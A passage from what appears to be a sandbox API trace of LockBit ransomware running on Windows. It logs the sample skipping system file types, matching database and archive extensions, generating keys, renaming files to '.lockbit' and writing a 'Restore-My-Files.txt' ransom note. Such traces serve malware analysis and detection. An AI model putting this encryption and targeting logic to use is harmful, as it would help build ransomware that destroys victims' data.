-1 [0147.150] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.150] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.151] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0171847.WMF") returned 1 [0147.151] lstrcmpiW (lpString1="ntldr", lpString2="J0171847.WMF") returned 1 [0147.151] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0171847.WMF") returned 1 [0147.151] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0171847.WMF") returned -1 [0147.151] lstrcmpiW (lpString1="autorun.inf", lpString2="J0171847.WMF") returned -1 [0147.151] lstrcmpiW (lpString1="thumbs.db", lpString2="J0171847.WMF") returned 1 [0147.151] lstrcmpiW (lpString1="iconcache.db", lpString2="J0171847.WMF") returned -1 [0147.151] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.151] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned=".WMF" [0147.151] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.151] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.151] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.151] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.151] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.151] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.151] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.151] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.151] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.151] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.151] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.152] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.152] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF.lockbit") returned 72 [0147.152] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171847.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0147.153] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.154] malloc (_Size=0x40068) returned 0x3d70450 [0147.154] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=6888) returned 1 [0147.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0147.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0147.155] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0147.176] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.176] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.176] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.178] free (_Block=0x1fa2ed8) [0147.178] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.178] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.178] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.178] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1d18, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0172035.WMF", cAlternateFileName="")) returned 1 [0147.178] lstrcmpiW (lpString1=".", lpString2="J0172035.WMF") returned -1 [0147.178] lstrcmpiW (lpString1="..", lpString2="J0172035.WMF") returned -1 [0147.178] PathFindExtensionW (pszPath="J0172035.WMF") returned=".WMF" [0147.178] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.178] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.178] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.178] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.178] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.178] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.178] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.178] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.179] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.180] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.180] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0172035.WMF") returned 1 [0147.180] lstrcmpiW (lpString1="ntldr", lpString2="J0172035.WMF") returned 1 [0147.181] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0172035.WMF") returned 1 [0147.181] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0172035.WMF") returned -1 [0147.181] lstrcmpiW (lpString1="autorun.inf", lpString2="J0172035.WMF") returned -1 [0147.181] lstrcmpiW (lpString1="thumbs.db", lpString2="J0172035.WMF") returned 1 [0147.181] lstrcmpiW (lpString1="iconcache.db", lpString2="J0172035.WMF") returned -1 [0147.181] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.181] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned=".WMF" [0147.181] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.181] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.181] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.181] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.181] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.181] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.181] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.181] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.181] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.181] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.181] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.181] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.181] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.181] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.182] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.182] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF.lockbit") returned 72 [0147.182] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172035.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.183] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.183] malloc (_Size=0x40068) returned 0x3e70008 [0147.183] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=7448) returned 1 [0147.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0147.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0147.185] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0147.190] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.190] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.190] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.191] free (_Block=0x1fa2ed8) [0147.191] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.191] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.191] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.191] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1b74, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0172067.WMF", cAlternateFileName="")) returned 1 [0147.191] lstrcmpiW (lpString1=".", lpString2="J0172067.WMF") returned -1 [0147.191] lstrcmpiW (lpString1="..", lpString2="J0172067.WMF") returned -1 [0147.191] PathFindExtensionW (pszPath="J0172067.WMF") returned=".WMF" [0147.192] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.192] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.193] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.193] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.194] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.194] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.194] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.194] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.194] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.194] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.194] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.194] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0172067.WMF") returned 1 [0147.194] lstrcmpiW (lpString1="ntldr", lpString2="J0172067.WMF") returned 1 [0147.194] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0172067.WMF") returned 1 [0147.194] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0172067.WMF") returned -1 [0147.194] lstrcmpiW (lpString1="autorun.inf", lpString2="J0172067.WMF") returned -1 [0147.194] lstrcmpiW (lpString1="thumbs.db", lpString2="J0172067.WMF") returned 1 [0147.194] lstrcmpiW (lpString1="iconcache.db", lpString2="J0172067.WMF") returned -1 [0147.194] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.194] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned=".WMF" [0147.194] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.194] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.194] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.194] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.194] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.195] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.196] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.196] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.196] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF.lockbit") returned 72 [0147.196] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172067.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0147.201] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.201] malloc (_Size=0x40068) returned 0x3df0008 [0147.201] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7028) returned 1 [0147.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.202] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.202] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.205] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.205] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.205] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.206] free (_Block=0x1fa2ed8) [0147.206] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.206] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.207] CreateFileW 